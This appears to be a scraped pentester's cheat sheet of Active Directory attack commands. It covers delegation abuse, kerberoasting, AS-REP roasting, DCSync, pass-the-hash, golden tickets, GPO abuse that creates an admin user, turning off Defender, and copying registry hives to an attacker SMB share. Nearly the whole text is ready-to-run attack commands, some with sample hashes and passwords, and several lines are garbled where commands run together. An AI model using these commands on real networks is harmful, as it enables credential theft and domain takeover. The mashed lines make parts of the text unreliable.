Hack. Eat. Sleep. Repeat!!!
BCD is configured by setting the msDS-AllowedToActOnBehalfOfOtherIdentity attribute.
This attribute specifies which service accounts or systems are permitted to act on behalf of users to access the target resource.
-To exploit this type of delegation, an attacker must gain access to an account with Write permissions on the targeted resource (computer object), such as GenericAll, GenericWrite, and WriteDACL.
SUPPORT@SUPPORT.HTB which the user I owned before is a member of a group called SHARED SUPPORT ACCOUNTS@SUPPORT.HTB. The group itself have full control to a computer called DC.SUPPORT.HTB, so in other words user SUPPORT have full control to DC.SUPPORT.HTB including write permission.[AddCOmputer]Syntax to add a computer-:addcomputer.py -computer-name 'password' -computer-pass 'password' -dc-ip [ip] '[domain]/[username]:[password]'
python3 rbcd.py 10.10.11.174 -u [domain]\\[user] -p '[password]' -t DC -f [newly created computer]
python3 getST.py -spn cifs/[object with unconstrained delegation over] -impersonate [user] -dc-ip [ip] '[domain]/[user]:[password]'
KRB5CCNAME for impacket-psexec.Syntax-:
KRB5CCNAME=[ccache file name [endswith .ccache] impacket-psexec [domain]/[user]@[object] -k -no-pass
KRB5CCNAME as an environmental variable
export KRB5CCNAME=$(pwd)/administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
impacket-secretsdump -k -target-ip [ip] [domain name]
impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev
hashcat.hashcat -m 13100 kerberoasted_sqldev /usr/share/wordlists/rockyou.txt
impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile kerberoasted_sqldev
impacket-GetUserSPNs -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request
impacket-GetUserSPNs might be unable to get the tickets due to time. Simple fix-:sudo faketime "$(rdate -n <domain-ip)" <binary>
sudo faketime "$(sudo rdate -n 192.168.232.129)" nxc ldap 192.168.232.129 -u 'stafani.ferdinanda' -p 'ncc1701' --kerberoast kerberoast.hashes
AES+PKDF2 ($krb5tgs$17$, $krb5tgs$18$)
RC+NTHASH (etype 23 ($krb5tgs$23$))
setspn -Q */*
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
setspn.exesetspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
base64 /out::true
kerberos::list /export
kirbi2johnjohnsed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' tickets.txt
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Get-DomainUser * -spn | Get-DomainSPNTicket -Format Hashcat | Export-csv .\powershell.csv -NoTypeInformation
.\Rubeus.exe kerberoast /stats
/nowrap flag.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
testspn.\Rubeus.exe kerberoast /user:testspn /nowrap
Powerview, msds-supportedencryptiontypes is set to AES 128/256Get-DomainUser testspn -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
/tgtdeleg to request for only RC4 encryption hash (type 23)-: .\Rubeus.exe kerberoast /user:testspn /nowrap /tgtdeleg
nxc ldap 192.168.232.129 -u valid_ad_username -p '' --asreproast valid_asrep_roast.txt
impacket-GETNPUsers-:impacket-GetNPUsers cs.org/ -usersfile valid_ad_username -dc-ip 192.168.232.129 -request -format john
john-:impacket-getTGT -dc-ip 192.168.232.129 'cs.org/stafani.ferdinanda:ncc1701' -debug
.ccache for easy login-:export KRB5CCNAME=/home/sensei/AD/lab/stafani.ferdinanda.ccache
If any account passwords are stored with reversible encryption, an option is available in Mimikatz to return the password in clear text.
impacket-secretsdump -just-dc mag.bekki:ncc1701@192.168.232.129 -outputfile dcsync_hashes
.\mimikatz.exe
lsadump::dcsync /user:Administrator /domain:cs.org
# Only the krbtgt account
secretsdump.py -just-dc-user krbtgt <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
# Only privileged objects selected through LDAP
secretsdump.py -just-dc-ntlm -ldapfilter '(adminCount=1)' <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
# Add metadata and password history for cracking/reuse analysis
secretsdump.py -just-dc-ntlm -history -pwd-last-set -user-status <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:57c5a5bc7c0e1f98e9c9d81161e74c44 Administrator@192.168.232.129
#Disabling windows real time protection
powershell.exe -c "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\system32> lput mimikatz.exe
[*] Uploading mimikatz.exe to ADMIN$\/
C:\Windows\system32> cd C:\windows
C:\Windows> dir /b mimikatz.exe
mimikatz.exe
runas-:runas /netonly /user:yourdomain\TargetUser cmd.exe
Members of the Backup Operators group possess SeBackupPrivilege and SeRestorePrivilege, which let them bypass normal file permissions to read protected system files. If the compromised user is also part of the Remote Management Users group, you can connect directly to the target via WinRM (using tools like evil-winrm) to run the exploitation chain interactively.
User stephanie.clara is a member of that group.
#Importing both dlls from the repo using powershell
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
bash -c "echo -ne 'set context persistent nowriters\nadd volume c: alias raj\ncreate expose %raj% z:' > backup.dsh;unix2dos backup.dsh"
C:\-:#disk shadow to create a shadow copy
diskshadow /s backup.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system
impacket-secretsdump-:impacket-secretsdump -ntds ntds.dit -system system LOCAL
backup_operator-:nxc smb 192.168.232.129 -d cs.org -u "stephanie.clara" -p 'ncc1701' -M backup_operator
impacket-regimpacket-smbserver share $(pwd) -smb2support
impacket-reg "cs.org"/"stephanie.clara":"password"@"192.168.232.129" backup -o '\\192.168.232.130\share'
nxc smb 10.1.129.131 -d dc01.martini.bars -u 'athena.t0' -p '1dirtymartini' --ntds --user krbtgt
A Golden Ticket attack consists of the creation of a legitimate Ticket Granting Ticket (TGT) impersonating any user through the use of the NTLM hash of the Active Directory (AD) krbtgt account. This technique is particularly advantageous because it enables access to any service or machine within the domain as the impersonated user. It’s crucial to remember that the krbtgt account’s credentials are never automatically updated.To acquire the NTLM hash of the krbtgt account, various methods can be employed. It can be extracted from the Local Security Authority Subsystem Service (LSASS) process or the NT Directory Services (NTDS.dit) file located on any Domain Controller (DC) within the domain. Furthermore, executing a DCsync attack is another strategy to obtain this NTLM hash, which can be performed using tools such as the lsadump::dcsync module in Mimikatz or the secretsdump.py script by Impacket. It’s important to underscore that to undertake these operations, domain admin privileges or a similar level of access is typically required.[2]
Get-ADDomain | Select-Object -ExpandProperty DomainSID
impacket-ticketer-:impacket-ticketer -nthash 22ebc290e67668629c8d0812662a9c51 -domain-sid S-1-5-21-3716536509-2861296316-2740169710 -domain dry.martini.bars Administrator
Domain Admins accounts should be able to create Computer accounts and it is limited to 10 for admins and 0 for users.nxc-:nxc ldap -u "dev" -p "password" -dc-ip dc01.papa.local -M maq
impacket-addcomputer -computer-name 'ControlledComputer$' -computer-pass 'ComputerPassword' -dc-host DC01 -domain-netbios domain 'domain.local/user1:complexpassword'
Using pre2k and nxc to exploit-:
nxc ldap 192.168.130.136 -u "dev" -p "password" -M pre2k
impacket-changepasswd tool-:impacket-changepasswd ignite.local/DEMO$@192.168.1.48 -newpass 'Password@987' -p rpc-samr
pygpoabuse-:pygpoabuse 'papa.local/dev:password' -gpo-id 'AD57560C-6272-4088-892B-C0A7D6D874D9' -command 'net user secret Password123! /add && net localgroup administrators secret /add' -v
impacket-findDelegation 'papa.local/delegation_user' -dc-ip 192.168.130.136 -hashes aad3b435b51404eeaad3b435b51404ee:4a5d8fb255b44f32cf2831a488b3afb1
addspn -u papa.local\\delegation_user -p 'aad3b435b51404eeaad3b435b51404ee:4a5d8fb255b44f32cf2831a488b3afb1' -s papa.local/delegated_user.papa.local --target-type samname 192.168.130.136
pywerview-:pywerview get-netuser -d papa.local -u delegation_user --hashes 'aad3b435b51404eeaad3b435b51404ee:4a5d8fb255b44f32cf2831a488b3afb1' -t 192.168.130.136 --unconstrained
-r is the new spnpython3 dnstool.py -u papa.local\\delegation_user -p 'aad3b435b51404eeaad3b435b51404ee:4a5d8fb255b44f32cf2831a488b3afb1' -r delegated_user.papa.local -a add --allow-multiple -d 192.168.130.132 192.168.130.136
python3 timeroast.py papa.local
Import-Module .\Invoke-AuthenticatedTimeRoast.ps1
Invoke-AuthenticatedTimeRoast -DomainController "dc01.papa.local"
hashcat -m 31300 -a 0 -O timeroast_hashes /home/sensei/rockyou.txt --username